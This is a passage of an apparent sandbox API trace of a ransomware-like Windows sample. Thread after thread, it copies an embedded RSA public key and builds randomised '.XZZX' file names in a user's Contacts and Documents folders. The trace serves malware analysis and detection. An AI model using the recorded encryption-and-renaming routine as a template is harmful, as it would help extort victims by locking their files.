Data4=([0]=0xa1, [1]=0x31, [2]=0x1d, [3]=0x42, [4]=0xa, [5]=0xa0, [6]=0xd9, [7]=0x32))) returned 0x0 [0101.108] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\3180D48C036A6FAAA02E258A076353F2.XZZX") returned 80 [0101.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0101.108] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\6933733531667EEE94775491359B6336.XZZX") returned 80 [0101.108] StrStrW (lpFirst="3180D48C036A6FAAA02E258A076353F2.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 271 os_tid = 0x6dc [0101.251] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0101.251] lstrcpyW (in: lpString1=0x420f460, lpString2="4C9E88000CB6CC7042EF328010E3B0B8.XZZX" | out: lpString1="4C9E88000CB6CC7042EF328010E3B0B8.XZZX") returned="4C9E88000CB6CC7042EF328010E3B0B8.XZZX" [0101.251] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0101.251] SetErrorMode (uMode=0x1) returned 0x1 [0101.251] lstrcpyW (in: lpString1=0x420f860, lpString2="4C9E88000CB6CC7042EF328010E3B0B8.XZZX" | out: lpString1="4C9E88000CB6CC7042EF328010E3B0B8.XZZX") returned="4C9E88000CB6CC7042EF328010E3B0B8.XZZX" [0101.251] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x6d197f0e, Data2=0x2408, Data3=0x4050, Data4=([0]=0x9c, [1]=0xaa, [2]=0x7a, [3]=0xf, [4]=0xa9, [5]=0x15, [6]=0xe7, [7]=0x7a))) returned 0x0 [0101.251] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\4C9E88000CB6CC7042EF328010E3B0B8.XZZX") returned 80 [0101.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0101.251] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\FEA9F070090D42806D197F0E0D2E26C8.XZZX") returned 80 [0101.251] StrStrW (lpFirst="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 272 os_tid = 0x6fc [0101.406] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0101.406] lstrcpyW (in: lpString1=0x420f460, lpString2="63AB35AD17277526536F22E31B54596E.XZZX" | out: lpString1="63AB35AD17277526536F22E31B54596E.XZZX") returned="63AB35AD17277526536F22E31B54596E.XZZX" [0101.406] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0101.406] SetErrorMode (uMode=0x1) returned 0x1 [0101.407] lstrcpyW (in: lpString1=0x420f860, lpString2="63AB35AD17277526536F22E31B54596E.XZZX" | out: lpString1="63AB35AD17277526536F22E31B54596E.XZZX") returned="63AB35AD17277526536F22E31B54596E.XZZX" [0101.407] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xdc5d3111, Data2=0x2801, Data3=0x433e, Data4=([0]=0xa6, [1]=0x2c, [2]=0x13, [3]=0x3, [4]=0x7d, [5]=0x1, [6]=0x10, [7]=0x2a))) returned 0x0 [0101.407] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\63AB35AD17277526536F22E31B54596E.XZZX") returned 80 [0101.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0101.407] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\6C07D9110A81F33EDC5D31110EA2D786.XZZX") returned 80 [0101.407] StrStrW (lpFirst="63AB35AD17277526536F22E31B54596E.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 273 os_tid = 0x710 [0101.564] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0101.564] lstrcpyW (in: lpString1=0x420f460, lpString2="8C424C551A76D4366F1622171E8EB87E.XZZX" | out: lpString1="8C424C551A76D4366F1622171E8EB87E.XZZX") returned="8C424C551A76D4366F1622171E8EB87E.XZZX" [0101.564] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0101.564] SetErrorMode (uMode=0x1) returned 0x1 [0101.564] lstrcpyW (in: lpString1=0x420f860, lpString2="8C424C551A76D4366F1622171E8EB87E.XZZX" | out: lpString1="8C424C551A76D4366F1622171E8EB87E.XZZX") returned="8C424C551A76D4366F1622171E8EB87E.XZZX" [0101.564] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x79e2d9ac, Data2=0xbecd, Data3=0x4d86, Data4=([0]=0xa6, [1]=0x8a, [2]=0x2e, [3]=0xd5, [4]=0x4, [5]=0xd8, [6]=0x2, [7]=0x42))) returned 0x0 [0101.564] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\8C424C551A76D4366F1622171E8EB87E.XZZX") returned 80 [0101.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0101.564] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\F835F6BC39C7884E79E2D9AC3DE86C96.XZZX") returned 80 [0101.564] StrStrW (lpFirst="8C424C551A76D4366F1622171E8EB87E.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 274 os_tid = 0x718 [0101.719] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0101.719] lstrcpyW (in: lpString1=0x420f460, lpString2="8DFF43342C68841C83BDE75D30616864.XZZX" | out: lpString1="8DFF43342C68841C83BDE75D30616864.XZZX") returned="8DFF43342C68841C83BDE75D30616864.XZZX" [0101.719] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0101.719] SetErrorMode (uMode=0x1) returned 0x1 [0101.719] lstrcpyW (in: lpString1=0x420f860, lpString2="8DFF43342C68841C83BDE75D30616864.XZZX" | out: lpString1="8DFF43342C68841C83BDE75D30616864.XZZX") returned="8DFF43342C68841C83BDE75D30616864.XZZX" [0101.719] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xa342ad54, Data2=0x7b3e, Data3=0x4ae5, Data4=([0]=0x8e, [1]=0x7e, [2]=0xd0, [3]=0xab, [4]=0x5c, [5]=0xf7, [6]=0xf6, [7]=0xa5))) returned 0x0 [0101.719] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\8DFF43342C68841C83BDE75D30616864.XZZX") returned 80 [0101.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0101.719] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\936D5658240E2A76A342AD54282F0EBE.XZZX") returned 80 [0101.720] StrStrW (lpFirst="8DFF43342C68841C83BDE75D30616864.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 275 os_tid = 0x728 [0101.875] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0101.875] lstrcpyW (in: lpString1=0x420f460, lpString2="FD82D02831F226B04645120F361F0AF8.XZZX" | out: lpString1="FD82D02831F226B04645120F361F0AF8.XZZX") returned="FD82D02831F226B04645120F361F0AF8.XZZX" [0101.875] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0101.875] SetErrorMode (uMode=0x1) returned 0x1 [0101.875] lstrcpyW (in: lpString1=0x420f860, lpString2="FD82D02831F226B04645120F361F0AF8.XZZX" | out: lpString1="FD82D02831F226B04645120F361F0AF8.XZZX") returned="FD82D02831F226B04645120F361F0AF8.XZZX" [0101.875] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x6dd7f1d1, Data2=0x5f6c, Data3=0x4d5f, Data4=([0]=0xa1, [1]=0xe, [2]=0x80, [3]=0x2f, [4]=0x5d, [5]=0x68, [6]=0x13, [7]=0x93))) returned 0x0 [0101.875] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\FD82D02831F226B04645120F361F0AF8.XZZX") returned 80 [0101.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0101.876] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\79D6932C1CD6E5146DD7F1D120F7C95C.XZZX") returned 80 [0101.876] StrStrW (lpFirst="FD82D02831F226B04645120F361F0AF8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 276 os_tid = 0x734 [0102.092] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0102.092] lstrcpyW (in: lpString1=0x420f460, lpString2="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" | out: lpString1="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX") returned="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" [0102.092] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0102.092] SetErrorMode (uMode=0x1) returned 0x1 [0102.092] lstrcpyW (in: lpString1=0x420f860, lpString2="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" | out: lpString1="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX") returned="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" [0102.092] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x644e0860, Data2=0xfbf0, Data3=0x4e62, Data4=([0]=0x83, [1]=0xfd, [2]=0x9d, [3]=0xeb, [4]=0x11, [5]=0x5b, [6]=0x38, [7]=0xe5))) returned 0x0 [0102.093] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2F2EBAD63A6E51CF01E49D9E3E863617.XZZX") returned 81 [0102.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0102.093] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8B5DFA004D2391E0644E086051447628.XZZX") returned 81 [0102.093] StrStrW (lpFirst="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 277 os_tid = 0x750 [0102.249] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0102.249] lstrcpyW (in: lpString1=0x420f460, lpString2="2FFB243E16646FF464F688111A91543C.XZZX" | out: lpString1="2FFB243E16646FF464F688111A91543C.XZZX") returned="2FFB243E16646FF464F688111A91543C.XZZX" [0102.249] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0102.249] SetErrorMode (uMode=0x1) returned 0x1 [0102.249] lstrcpyW (in: lpString1=0x420f860, lpString2="2FFB243E16646FF464F688111A91543C.XZZX" | out: lpString1="2FFB243E16646FF464F688111A91543C.XZZX") returned="2FFB243E16646FF464F688111A91543C.XZZX" [0102.249] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x719d5e65, Data2=0x7c67, Data3=0x4981, Data4=([0]=0x91, [1]=0xa5, [2]=0xde, [3]=0xf8, [4]=0xc9, [5]=0x4a, [6]=0xae, [7]=0x7a))) returned 0x0 [0102.249] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2FFB243E16646FF464F688111A91543C.XZZX") returned 81 [0102.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0102.249] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F009E6A323B80EE7719D5E6527D8F32F.XZZX") returned 81 [0102.249] StrStrW (lpFirst="2FFB243E16646FF464F688111A91543C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 278 os_tid = 0x760 [0102.405] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0102.405] lstrcpyW (in: lpString1=0x420f460, lpString2="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" | out: lpString1="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX") returned="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" [0102.406] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0102.406] SetErrorMode (uMode=0x1) returned 0x1 [0102.406] lstrcpyW (in: lpString1=0x420f860, lpString2="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" | out: lpString1="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX") returned="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" [0102.406] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xde5d9df, Data2=0xfdc, Data3=0x4911, Data4=([0]=0x96, [1]=0x8f, [2]=0xe8, [3]=0x2e, [4]=0x70, [5]=0xa5, [6]=0xac, [7]=0x5e))) returned 0x0 [0102.406] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\38AA9E1F3FE71932FADE96E143FEFD7A.XZZX") returned 81 [0102.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0102.406] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\694B4CA40486C99C0DE5D9DF08A7ADE4.XZZX") returned 81 [0102.406] StrStrW (lpFirst="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 279 os_tid = 0x774 [0102.561] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 